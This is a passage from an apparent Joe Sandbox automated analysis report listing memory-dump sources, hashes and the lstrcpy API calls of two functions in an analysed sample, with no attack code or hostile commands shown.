                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID:
                              • API String ID: 3722407311-0
                              • Opcode ID: 93c54488305130574c844b438686ddbbc492fe0ea21eb7bbd87bee0fec95e6cb
                              • Instruction ID: 1e43c2c1fb4035efab0a0a6c4e13ab6d15df416e453fd5b18db43aa655b1154e
                              • Opcode Fuzzy Hash: 93c54488305130574c844b438686ddbbc492fe0ea21eb7bbd87bee0fec95e6cb
                              • Instruction Fuzzy Hash: 57213974611B02ABD724DF2AD498B17B7F4AF44300B444A1DA89BD7B41EB38F851CBA0
                              Function 007B1530 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 007B1610: lstrcpy.KERNEL32(00000000), ref: 007B162D
                                • Part of subcall function 007B1610: lstrcpy.KERNEL32(00000000,?), ref: 007B164F
                                • Part of subcall function 007B1610: lstrcpy.KERNEL32(00000000,?), ref: 007B1671
                                • Part of subcall function 007B1610: lstrcpy.KERNEL32(00000000,?), ref: 007B1693
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B1557
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B1579
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B159B
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B15FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID:
                              • API String ID: 3722407311-0
                              • Opcode ID: 03920d4f91d4823a5a73fe38b1b42fe8b030078cf5f9869a8fa31c63734d9c18
                              • Instruction ID: a3be942feb1e90c19b7606ee71d847adb538a66547341e4dbeb1cfc7eece23ce
                              • Opcode Fuzzy Hash: 03920d4f91d4823a5a73fe38b1b42fe8b030078cf5f9869a8fa31c63734d9c18
                              • Instruction Fuzzy Hash: A331B474A15B42DFD724DF3AC598A96BBE5BF89305784492DA896C3B10DB34F821CB80
                              Function 007B1610 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000), ref: 007B162D
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B164F
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B1671
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B1693
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID:
                              • API String ID: 3722407311-0
                              • Opcode ID: 4447b29f294eaec1b14ae02c3ec19006fb7727c4846eb68b77f1ace2eace4a06
                              • Instruction ID: d2873bf035c4b5419ba3fcd0bd06011ca2befe78e34347689048f4d0c4f51f90
                              • Opcode Fuzzy Hash: 4447b29f294eaec1b14ae02c3ec19006fb7727c4846eb68b77f1ace2eace4a06
                              • Instruction Fuzzy Hash: 46112E74A16B029BDB249F35D46CA66B7F8BF44305788052DA89AC7B41EF38F801CB90